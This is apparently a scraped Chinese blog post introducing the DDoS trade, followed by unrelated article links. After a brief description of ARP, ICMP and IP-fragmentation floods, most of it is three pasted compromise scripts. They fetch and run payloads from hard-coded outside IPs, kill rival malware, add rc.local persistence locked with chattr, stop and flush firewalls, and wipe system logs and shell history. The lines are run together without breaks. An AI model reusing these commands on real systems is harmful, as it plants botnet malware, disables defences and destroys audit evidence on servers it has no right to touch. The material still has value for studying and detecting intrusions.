简单了解下DDOS产业
为了更清楚的解释,阅读了很多这样的文章,DDOS的百度百科解释如下:
基于ARP
ARP是无连接的协议,当收到攻击者发送来的ARP应答时。它将接收ARP应答包中所提供的信息。更新ARP缓存。因此,含有错误源地址信息的ARP请求和含有错误目标地址信息的ARP应答均会使上层应用忙于处理这种异常而无法响应外来请求,使得目标主机丧失网络通信能力。产生拒绝服务,如ARP重定向攻击。
基于ICMP
攻击者向一个子网的广播地址发送多个ICMP Echo请求数据包。并将源地址伪装成想要攻击的目标主机的地址。这样,该子网上的所有主机均对此ICMP Echo请求包作出答复,向被攻击的目标主机发送数据包,使该主机受到攻击,导致网络阻塞。
基于IP
TCP/IP中的IP数据包在网络传递时,数据包可以分成更小的片段。到达目的地后再进行合并重装。在实现分段重新组装的进程中存在漏洞,缺乏必要的检查。利用IP报文分片后重组的重叠现象攻击服务器,进而引起服务器内核崩溃。如Teardrop是基于IP的攻击。
基于应用层
apt-get install curlyum install curlcurl http://121.40.175.22:15651/95 -o /tmp/gftykillall -I -q Linux6 ifconf 123killall -I -q LAdmins Admins asxperkillall -I -q g251 koiu winsx synlinshikillall -I -q mysql sysyang ifconfigethO whoami ifconfigethokillall -I -q gmetad cvn hanx .xdsy hssa ggu ggy gg azda .sshd bashpakillall -I -q sshpa udevd .SSH2 .SSHH2 nhgbhhj zl pro proh DDos64 DDos32killall -I -q dos64 dos32 sfewfesfs sfewfesfsh IptabLes tangwe IptabLexkillall -I -q .IptabLes .IptabLex 1 perl System Admins Linuxsys System32 ruskillall -I -q sql tel netstat -an ddos32_64.64 Admins koiu 315 64 udpkillall -I -q koi Chinesepoli 508 topsing weige udpapt-get install wgetyum install wgetwget -c -O /tmp/gfty http://121.40.175.22:15651/95chmod 0755 /tmp/gfty/tmp/gfty./gftynohup /tmp/gfty > /dev/null 2>&1 &echo “service gfty”>>/etc/rc.localecho “/tmp/gfty”>>/etc/rc.localchattr +i /tmp/gftyapt-get -y remove curlyum -y remove curlapt-get -y remove wgetyum -y remove wgetclearhistory -c
例子2:
cd /tmpservice iptables stoprm -rf /etc/crontabrm -rf /usr/bin/bsd-port/gettyrm -rf /usr/bin/bsd-port/*killall -9 gettyfind ./ -name “S90*” | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -frps -ef | grep -v ‘ssh’ |awk ‘{if ($3 == 1) print $2}’ | xargs kill -9yum -y install wgetwget -c http://222.186.34.174:9655/aachmod 777 aa./aawget -c http://222.186.34.174:9655/17230chmod 777 17230./17230iptables -I INPUT -s 116.31.123.159 -j DROPiptables -I INPUT -s 183.60.110.74 -j DROPiptables -I INPUT -s 122.224.32.32 -j DROPiptables -I INPUT -s 149.56.107.161 -j DROPiptables -I INPUT -s 104.223.10.48 -j DROPiptables -I INPUT -s 178.170.68.69 -j DROPiptables -I INPUT -s 158.69.219.235 -j DROPiptables -I INPUT -s 164.132.170.78 -j DROPiptables -I INPUT -s 149.202.219.49 -j DROPiptables -I INPUT -s 124.16.31.156 -j DROPiptables -I INPUT -s 183.61.171.149 -j DROPiptables -I INPUT -s 61.157.167.74 -j DROPiptables -I INPUT -s 119.63.44.35 -j DROPiptables -I INPUT -s 42.51.23.80 -j DROPiptables -I INPUT -s 104.129.35.178 -j DROPiptables -I INPUT -s 103.31.240.133 -j DROPiptables -I INPUT -s 100.42.227.29 -j DROPiptables -I INPUT -s 107.160.46.234 -j DROPiptables -I INPUT -s 222.186.34.73 -j DROPiptables -I INPUT -s 36.249.123.134 -j DROPiptables -I INPUT -s 118.193.214.160 -j DROPiptables -I INPUT -s 104.37.213.35 -j DROPiptables -I INPUT -s 58.54.39.51 -j DROPiptables -I INPUT -s 23.247.5.12 -j DROPiptables -I INPUT -s 23.247.5.11 -j DROPiptables -I INPUT -s 51.255.84.218 -j DROPiptables -I INPUT -s 98.126.8.114 -j DROPiptables -I INPUT -s 222.174.5.13 -j DROPiptables -I INPUT -s 123.184.16.119 -j DROPiptables -I INPUT -s 103.214.169.184 -j DROPiptables -I INPUT -s 103.236.220.90 -j DROPiptables -I INPUT -s 103.55.25.57 -j DROPiptables -I INPUT -s 103.55.26.91 -j DROPiptables -I INPUT -s 104.223.6.159 -j DROPiptables -I INPUT -s 107.160.46.234 -j DROPiptables -I INPUT -s 111.160.17.8 -j DROPiptables -I INPUT -s 114.112.27.83 -j DROPiptables -I INPUT -s 115.231.219.34 -j DROPiptables -I INPUT -s 115.28.206.48 -j DROPiptables -I INPUT -s 116.31.116.28 -j DROPiptables -I INPUT -s 117.18.4.110 -j DROPiptables -I INPUT -s 122.225.102.131 -j DROPiptables -I INPUT -s 123.184.16.119 -j DROPiptables -I INPUT -s 14.29.47.15 -j DROPiptables -I INPUT -s 149.202.210.93 -j DROPiptables -I INPUT -s 180.97.163.228 -j DROPiptables -I INPUT -s 183.60.0.0/24 -j DROPiptables -I INPUT -s 183.60.110.83 -j DROPiptables -I INPUT -s 183.60.149.196 -j DROPiptables -I INPUT -s 183.60.149.199 -j DROPiptables -I INPUT -s 183.61.171.147 -j DROPiptables -I INPUT -s 198.44.177.102 -j DROPiptables -I INPUT -s 204.44.67.19 -j DROPiptables -I INPUT -s 23.234.25.143 -j DROPiptables -I INPUT -s 23.234.28.85 -j DROPiptables -I INPUT -s 51.255.66.195 -j DROPiptables -I INPUT -s 58.218.200.111 -j DROPiptables -I INPUT -s 61.160.195.78 -j DROPiptables -I INPUT -s 61.174.49.203 -j DROPiptables -I INPUT -s 66.102.253.30 -j DROPiptables -I INPUT -s 66.249.65.123 -j DROPiptables -I INPUT -s 115.231.17.7 -j DROPiptables -I INPUT -s 61.174.49.203 -j DROPecho> /var/log/wtmpecho> /root/bash_historyecho> /var/log/syslogecho> /var/log/messagesecho> /var/log/httpd/access_logecho> /var/log/httpd/error_logecho> /var/log/xferlogecho> /var/log/secureecho> /var/log/auth.logecho> /var/log/user.logecho> /var/log/wtmpecho> /var/log/lastlogecho> /var/log/btmpecho> /var/run/utmphistory -cexit
例子3:
/etc/init.d/iptables stopservice iptables stopSuSEfirewall2 stopreSuSEfirewall2 stopiptables -F/etc/init.d/iptables stopservice iptables stopSuSEfirewall2 stopreSuSEfirewall2 stopiptables -F/etc/init.d/iptables stopservice iptables stopSuSEfirewall2 stopreSuSEfirewall2 stopiptables -Fchattr -i /usr/bin/wgetchmod 755 /usr/bin/wgetwget -P /bin/ http://43.230.144.65/zz -cchmod 0755 /bin/zznohup /bin/zz > /dev/null 2>&1 &chattr +i /usr/bin/wgetchmod 0 /usr/libexec/openssh/sftp-serverchattr +i /usr/libexec/openssh/sftp-serverecho ‘ ‘ > /var/log/wtmpecho ‘ ‘ > /var/log/lastlogecho ‘ ‘ > /var/log/messagesexport HISTFILE=/dev/nullrm -f /var/log/wtmprm -f .bash_historyhistory -c
来一张DDOS控制面板
简单了解下DDOS产业相关推荐
- CVer最想知道的,简单分析下《2020年度中国计算机视觉人才调研报告》
文章首发于CVer最想知道的,简单分析下<2020年度中国计算机视觉人才调研报告> 最近闲来无事,老潘以一名普通算法工程师的角度,结合自身以及周围人的情况,理性也感性地分析一下极市平台前些 ...
- [面试]:能简单介绍下您现在所做项目和过程中的技术难点或有遇到瓶颈吗?
思路转载自Hollis的知识星球,有兴趣的可以搜一下,很不错. 业务介绍: 1.痛点:解决的问题,用户痛点 2.正确性 3.可用性 4.大规模:量级 思考问题: 宏观,不局限于业务 这种问题直接回答高 ...
- HTML+CSS综合实验之简单实现环球互联网产业园网页--渐入HTML4
HTML+CSS综合实验之简单实现环球互联网产业园网页--渐入HTML4 预计效果图 代码展示 关键代码解释 CSS css概述 多重样式将层叠为一个 伪类 锚伪类 伪类与 CSS 类 结果展示 预计 ...
- php doss_php下ddos攻击与防范代码
php下ddos攻击与防范代码,有需要的朋友可以参考下. 文件:index.php 复制代码 代码如下: $ip = $_SERVER['REMOTE_ADDR']; ?> PHP DoS, C ...
- Example017简单的下拉框
<!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8" ...
- springdatajpa命名规则_简单了解下spring data jpa
公司准备搭建一个通用框架,以后项目就用统一一套框架了 以前只是听过jpa,但是没有实际用过 今天就来学习下一些简单的知识 什么是JPA 全称Java Persistence API,可以通过注解或者X ...
- html下拉折叠菜单,原生Js_实现简单的下拉折叠菜单(添加弹出动画效果)
用javascript实现简单的下拉折叠菜单 Gary_js实现简单的下拉折叠菜单 *{margin:0px; padding:0px;} #div1 {width:200px; margin:0 a ...
- 简单介绍下我使用了一年多还不知道的Sql server 2005 组件知识
简介 Microsoft SQL Server 2005 是用于大规模联机事务处理 (OLTP).数据仓库和电子商务应用的数据库平台:也是用于数据集成.分析和报表解决方案的商业智能平台. SQL Se ...
- python网站设计理念_简单介绍下python Django框架的历史,设计理念及优势_Django讲解2...
简单介绍下python Django框架的历史,设计理念及优势 Django是一个高层次的 Python Web 框架,它是一个鼓励快速开发和干净,实用的框架设计.Django可以更容易地快速构建更好 ...
最新文章
- act转MP3格式工具
- MyBatis 的执行流程,写得太好了!
- mysql node
- 3:添加一个slave到已有的复制环境(基于二进制日志文件位置)
- Python文件读写时的换行符与回车符
- 视频分享:做“有料”的计算机大学生
- matlab ga工具箱编程,遗传算法 -- matlab ga工具箱
- 工业以太网EtherNet/IP协议安全分析整理
- Codeforces 235C. Cyclical Quest 后缀自动机
- SPRING IN ACTION 第4版笔记-第八章Advanced Spring MVC-003-Pizza例子的基本流程
- python str怎么用_python的str函数怎么使用
- Redis - Redis分布式算法原理——Hash一致性理解 Hash倾斜性解决方案
- 微信群控系统制作系列一——java模拟登录网页版微信
- 阿里企业邮箱设置过滤方法
- 如何让mysql数据库允许被远程连接访问
- spring boot的启动与配置
- 通过CTFShow例题掌握爆破方法
- Java SE day21_网络编程
- 08 Confluent_Kafka权威指南 第八章:跨集群数据镜像
- JS正则表达式完整教程